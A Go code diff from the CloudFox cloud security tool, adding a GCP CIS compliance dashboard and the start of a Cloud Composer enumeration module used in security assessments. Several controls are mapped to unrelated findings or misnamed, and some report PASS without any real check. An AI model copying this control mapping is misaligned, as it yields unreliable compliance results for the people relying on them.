0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing SSH from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_7_FlowLogs(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC Flow Logs is enabled for every subnet", + Description: "VPC Flow Logs provide network traffic visibility", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable VPC Flow Logs on all subnets", + } + + if findings, ok := m.sccFindings["FLOW_LOGS_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_8_SSLPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSL policies use secure TLS versions", + Description: "SSL policies should require TLS 1.2 or higher", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Update SSL policies to require TLS 1.2+", + } + + if findings, ok := m.sccFindings["WEAK_SSL_POLICY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_9_FirewallLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure firewall rule logging is enabled", + Description: "Firewall rule logging provides audit trail for network access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable logging on all firewall rules", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_10_VPCNetworkPeering(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC network peering is properly configured", + Description: "Review VPC peering for appropriate trust relationships", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Review and document all VPC peering relationships", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 4: Virtual Machine Controls +func (m *ComplianceDashboardModule) checkCIS_4_1_DefaultServiceAccount(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default Compute Engine service account is not used", + Description: "VMs should use custom service accounts with minimal permissions", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Create custom service accounts for compute instances", + } + + if findings, ok := m.sccFindings["DEFAULT_SERVICE_ACCOUNT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs using default service account", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "compute-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_2_BlockProjectWideSSH(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure block project-wide SSH keys is enabled", + Description: "Block project-wide SSH keys to enforce instance-level access control", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable 'Block project-wide SSH keys' on all instances", + } + + if findings, ok := m.sccFindings["PROJECT_WIDE_SSH_KEYS_ALLOWED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_3_OSLogin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure OS Login is enabled", + Description: "OS Login provides centralized SSH access management via IAM", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable OS Login at project or instance level", + } + + if findings, ok := m.sccFindings["OS_LOGIN_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_4_SerialPortDisabled(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure serial port access is disabled", + Description: "Serial port access should be disabled for security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable serial port access on all instances", + } + + if findings, ok := m.sccFindings["SERIAL_PORT_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_5_IPForwarding(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure IP forwarding is disabled unless required", + Description: "IP forwarding should only be enabled on NAT/gateway instances", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable IP forwarding on instances that don't require it", + } + + if findings, ok := m.sccFindings["IP_FORWARDING_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_6_PublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VMs do not have public IP addresses", + Description: "VMs should use private IPs and access internet via NAT", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Remove public IPs and use Cloud NAT for internet access", + } + + if findings, ok := m.sccFindings["PUBLIC_IP_ADDRESS"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs with public IP addresses", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_7_ShieldedVM(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Shielded VM is enabled", + Description: "Shielded VMs provide verifiable integrity and boot security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable Shielded VM features on all instances", + } + + if findings, ok := m.sccFindings["SHIELDED_VM_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_8_ComputeEncryption(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Compute Engine disks are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for disk encryption", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for all Compute Engine disks", + } + + if findings, ok := m.sccFindings["DISK_CSEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_9_ConfidentialComputing(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.9", + Framework: "CIS-GCP-2.0", + ControlName: "Consider enabling Confidential Computing for sensitive workloads", + Description: "Confidential VMs encrypt data in use", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Evaluate Confidential Computing for sensitive workloads", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 5: Storage Controls +func (m *ComplianceDashboardModule) checkCIS_5_1_UniformBucketAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure uniform bucket-level access is enabled", + Description: "Uniform bucket-level access simplifies and secures IAM permissions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable uniform bucket-level access on all buckets", + } + + if findings, ok := m.sccFindings["BUCKET_IAM_NOT_MONITORED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_5_2_PublicBuckets(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Storage buckets are not anonymously or publicly accessible", + Description: "Storage buckets should not allow public access", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove allUsers and allAuthenticatedUsers from bucket IAM", + } + + publicFindings := []string{} + for category, findings := range m.sccFindings { + if strings.Contains(strings.ToLower(category), "public_bucket") || + strings.Contains(strings.ToLower(category), "bucket_public") { + publicFindings = append(publicFindings, findings...) + } + } + + if len(publicFindings) > 0 { + control.Status = "FAIL" + control.FailCount = len(publicFindings) + control.Details = fmt.Sprintf("Found %d publicly accessible buckets", len(publicFindings)) + + for _, resource := range publicFindings { + m.addFailure(control, resource, "storage-bucket", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 6: Cloud SQL Controls +func (m *ComplianceDashboardModule) checkCIS_6_1_SQLPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances do not have public IPs", + Description: "Cloud SQL should use private IP only", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Configure Cloud SQL to use private IP only", + } + + if findings, ok := m.sccFindings["SQL_PUBLIC_IP"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d Cloud SQL instances with public IP", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "cloudsql-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_2_SQLAuthorizedNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL authorized networks do not include 0.0.0.0/0", + Description: "Restrict authorized networks to specific IP ranges", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove 0.0.0.0/0 from authorized networks", + } + + if findings, ok := m.sccFindings["SQL_WORLD_READABLE"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_3_SQLSSLRequired(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL requires SSL connections", + Description: "SSL should be required for all database connections", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable 'Require SSL' for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_NO_ROOT_PASSWORD"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_4_SQLNoPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL database instances are configured with automated backups", + Description: "Automated backups ensure data recovery capability", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable automated backups for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_BACKUP_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_5_SQLBackups(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances are using the latest major version", + Description: "Use latest major database version for security updates", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Upgrade Cloud SQL instances to latest major version", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_6_SQLContainedDB(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure contained database authentication is off for SQL Server", + Description: "Disable contained database authentication for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'contained database authentication' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_7_SQLCrossDBAOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure cross db ownership chaining is off for SQL Server", + Description: "Disable cross db ownership chaining for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'cross db ownership chaining' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 7: BigQuery Controls +func (m *ComplianceDashboardModule) checkCIS_7_1_BigQueryCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery datasets", + } + + if findings, ok := m.sccFindings["BIGQUERY_TABLE_CMEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_2_BigQueryTableCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery tables are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery tables", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery tables", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_3_BigQueryDatasetPublic(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are not publicly accessible", + Description: "BigQuery datasets should not allow allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from BigQuery datasets", + } + + if findings, ok := m.sccFindings["BIGQUERY_TABLE_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible BigQuery datasets", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "bigquery-dataset", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// ------------------------------ +// Framework Mapping +// ------------------------------ +func (m *ComplianceDashboardModule) mapToFrameworks() { + // Map CIS controls to other frameworks + for _, control := range m.Controls { + // Update CIS framework stats + if fw, ok := m.Frameworks["CIS-GCP-2.0"]; ok { + fw.TotalControls++ + switch control.Status { + case "PASS": + fw.PassedControls++ + case "FAIL": + fw.FailedControls++ + case "MANUAL": + fw.ManualControls++ + case "NOT_APPLICABLE": + fw.NAControls++ + } + } + } + + // Calculate scores for each framework + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + assessed := fw.PassedControls + fw.FailedControls + if assessed > 0 { + fw.Score = float64(fw.PassedControls) / float64(assessed) * 100 + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *ComplianceDashboardModule) addFailure(control ComplianceControl, resource, resourceType, projectID string) { + failure := ComplianceFailure{ + ControlID: control.ControlID, + Framework: control.Framework, + ControlName: control.ControlName, + Severity: control.Severity, + ResourceName: resource, + ResourceType: resourceType, + ProjectID: projectID, + Details: control.Details, + Remediation: control.Remediation, + RiskScore: m.calculateComplianceRiskScore(control.Severity), + } + + m.mu.Lock() + m.Failures = append(m.Failures, failure) + m.mu.Unlock() + + // Add to loot + m.addFailureToLoot(failure) +} + +func (m *ComplianceDashboardModule) calculateComplianceRiskScore(severity string) int { + switch severity { + case "CRITICAL": + return 100 + case "HIGH": + return 80 + case "MEDIUM": + return 50 + case "LOW": + return 25 + default: + return 10 + } +} + +func (m *ComplianceDashboardModule) getProjectFromResource(resource string) string { + // Extract project ID from resource name + // Format: projects/{project}/... + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ComplianceDashboardModule) initializeLootFiles() { + m.LootMap["compliance-critical-failures"] = &internal.LootFile{ + Name: "compliance-critical-failures", + Contents: "# Compliance Dashboard - Critical Failures\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["compliance-remediation-commands"] = &internal.LootFile{ + Name: "compliance-remediation-commands", + Contents: "# Compliance Dashboard - Remediation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["compliance-by-framework"] = &internal.LootFile{ + Name: "compliance-by-framework", + Contents: "# Compliance Dashboard - Framework Summary\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["compliance-failed-controls"] = &internal.LootFile{ + Name: "compliance-failed-controls", + Contents: "# Compliance Dashboard - Failed Controls\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ComplianceDashboardModule) addFailureToLoot(failure ComplianceFailure) { + m.mu.Lock() + defer m.mu.Unlock() + + // Critical failures + if failure.Severity == "CRITICAL" { + m.LootMap["compliance-critical-failures"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s - %s\n"+ + "# =============================================================================\n"+ + "# Framework: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n"+ + "# Risk Score: %d\n"+ + "# Remediation: %s\n\n", + failure.ControlID, + failure.ControlName, + failure.Framework, + failure.ResourceName, + failure.ProjectID, + failure.RiskScore, + failure.Remediation, + ) + } + + // Remediation commands + m.LootMap["compliance-remediation-commands"].Contents += fmt.Sprintf( + "# %s: %s\n"+ + "# Resource: %s\n"+ + "# %s\n\n", + failure.ControlID, + failure.ControlName, + failure.ResourceName, + failure.Remediation, + ) + + // Failed controls + m.LootMap["compliance-failed-controls"].Contents += fmt.Sprintf( + "%s (%s) - %s\n", + failure.ControlID, + failure.Severity, + failure.ResourceName, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ComplianceDashboardModule) buildTables() []internal.TableFile { + // Sort controls by severity, then control ID + sort.Slice(m.Controls, func(i, j int) bool { + if m.Controls[i].Status == "FAIL" && m.Controls[j].Status != "FAIL" { + return true + } + if m.Controls[i].Status != "FAIL" && m.Controls[j].Status == "FAIL" { + return false + } + severityOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + if severityOrder[m.Controls[i].Severity] != severityOrder[m.Controls[j].Severity] { + return severityOrder[m.Controls[i].Severity] < severityOrder[m.Controls[j].Severity] + } + return m.Controls[i].ControlID < m.Controls[j].ControlID + }) + + // Controls table + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range m.Controls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + c.ControlName, + c.Framework, + c.Severity, + c.Status, + details, + }) + } + + // Failures table + failuresHeader := []string{ + "Control ID", + "Severity", + "Resource", + "Type", + "Project Name", + "Project ID", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range m.Failures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + f.ResourceName, + f.ResourceType, + m.GetProjectName(f.ProjectID), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + + // Framework summary table + frameworkHeader := []string{ + "Framework", + "Version", + "Total", + "Passed", + "Failed", + "Manual", + "Score (%)", + } + + var frameworkBody [][]string + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + frameworkBody = append(frameworkBody, []string{ + fw.Name, + fw.Version, + fmt.Sprintf("%d", fw.TotalControls), + fmt.Sprintf("%d", fw.PassedControls), + fmt.Sprintf("%d", fw.FailedControls), + fmt.Sprintf("%d", fw.ManualControls), + fmt.Sprintf("%.1f", fw.Score), + }) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }, + } + + // Add failures table if any + if len(failuresBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + // Add framework summary table + if len(frameworkBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-summary", + Header: frameworkHeader, + Body: frameworkBody, + }) + } + + return tables +} + +func (m *ComplianceDashboardModule) collectLootFiles() []internal.LootFile { + // Add framework summary to loot + for _, fw := range m.Frameworks { + if fw.TotalControls > 0 { + m.LootMap["compliance-by-framework"].Contents += fmt.Sprintf( + "## %s v%s\n"+ + "Total Controls: %d\n"+ + "Passed: %d\n"+ + "Failed: %d\n"+ + "Manual Review: %d\n"+ + "Compliance Score: %.1f%%\n\n", + fw.Name, + fw.Version, + fw.TotalControls, + fw.PassedControls, + fw.FailedControls, + fw.ManualControls, + fw.Score, + ) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *ComplianceDashboardModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID - prefer project metadata, fall back to hierarchy + orgID := "" + for _, metadata := range m.projectMetadata { + if parent, ok := metadata["parent"]; ok { + if parentStr, ok := parent.(string); ok && strings.HasPrefix(parentStr, "organizations/") { + orgID = strings.TrimPrefix(parentStr, "organizations/") + break + } + } + } + if orgID == "" && m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = ComplianceDashboardOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 { + outputData.ProjectLevelData[projectID] = ComplianceDashboardOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = ComplianceDashboardOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *ComplianceDashboardModule) buildTablesForProject(projectID string) []internal.TableFile { + // Filter controls for this project + var projectControls []ComplianceControl + for _, c := range m.Controls { + if c.ProjectID == projectID || c.ProjectID == "" { + projectControls = append(projectControls, c) + } + } + + // Filter failures for this project + var projectFailures []ComplianceFailure + for _, f := range m.Failures { + if f.ProjectID == projectID { + projectFailures = append(projectFailures, f) + } + } + + // If no project-specific data, return empty + if len(projectControls) == 0 && len(projectFailures) == 0 { + return nil + } + + var tables []internal.TableFile + + // Controls table + if len(projectControls) > 0 { + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range projectControls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + c.ControlName, + c.Framework, + c.Severity, + c.Status, + details, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }) + } + + // Failures table + if len(projectFailures) > 0 { + failuresHeader := []string{ + "Control ID", + "Severity", + "Resource", + "Type", + "Project Name", + "Project ID", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range projectFailures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + f.ResourceName, + f.ResourceType, + m.GetProjectName(f.ProjectID), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + return tables +} + +func (m *ComplianceDashboardModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := ComplianceDashboardOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go new file mode 100644 index 00000000..39bb7979 --- /dev/null +++ b/gcp/commands/composer.go @@ -0,0 +1,388 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPComposerCommand = &cobra.Command{ + Use: globals.GCP_COMPOSER_MODULE_NAME, + Aliases: []string{"airflow"}, + Short: "Enumerate Cloud Composer environments", + Long: `Enumerate Cloud Composer (managed Apache Airflow) environments. + +Features: +- Lists all Composer environments across locations +- Shows Airflow web UI endpoints +- Identifies service account configuration +- Analyzes network exposure (private vs public) +- Detects overly permissive IP restrictions`, + Run: runGCPComposerCommand, +} + +type ComposerModule struct { + gcpinternal.BaseGCPModule + ProjectEnvironments map[string][]composerservice.EnvironmentInfo // projectID -> environments + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis + mu sync.Mutex +} + +type ComposerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComposerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComposerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPComposerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_COMPOSER_MODULE_NAME) + if err != nil { + return + } + + module := &ComposerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEnvironments: make(map[string][]composerservice.EnvironmentInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + 